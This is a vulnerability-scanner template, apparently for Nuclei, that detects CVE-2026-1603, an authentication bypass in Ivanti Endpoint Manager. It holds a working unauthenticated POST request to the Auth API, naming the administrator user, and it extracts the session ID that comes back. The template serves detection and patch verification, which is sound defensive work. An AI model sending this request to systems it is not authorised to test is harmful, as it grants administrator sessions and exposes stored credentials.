id: CVE-2026-1603 info: name: Ivanti Endpoint Manager - Authentication Bypass author: DhiyaneshDk,watchtowrlabs severity: high description: | Ivanti Endpoint Manager < 2024 SU5 contains an authentication bypass caused by improper access control, letting remote unauthenticated attackers leak stored credential data, exploit requires no special privileges. impact: | Remote attackers can leak stored credential data, potentially compromising sensitive information. remediation: | Update to version 2024 SU5 or later. reference: - https://x.com/watchtowrcyber/status/2022305033086235108/photo/1 - https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 - https://nvd.nist.gov/vuln/detail/CVE-2026-1603 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2026-1603 cwe-id: CWE-288 epss-score: 0.8056 epss-percentile: 0.99582 cpe: cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ivanti product: endpoint_manager tags: cve,cve2026,api,auth,ivanti,epmm,authbypass,vkev,kev http: - raw: - | POST /RemoteControlAuth/api/Auth HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "logintype":"64", "username":"administrator" } matchers-condition: and matchers: - type: word part: body words: - '"sessionid":' - type: word part: body words: - '"sessionid": null' negative: true - type: status status: - 200 extractors: - type: json part: body name: sessionid json: - '.sessionid' # digest: 4b0a00483046022100e766697a7259129edfedc60b59b70ef25046cd4c906fd435abc2071a86aacce40221008017755726bbd416d8c2632d3072e6a17029ab946a834f7061d5f24bfb055e73:922c64590222798bb761d5b6d8e72950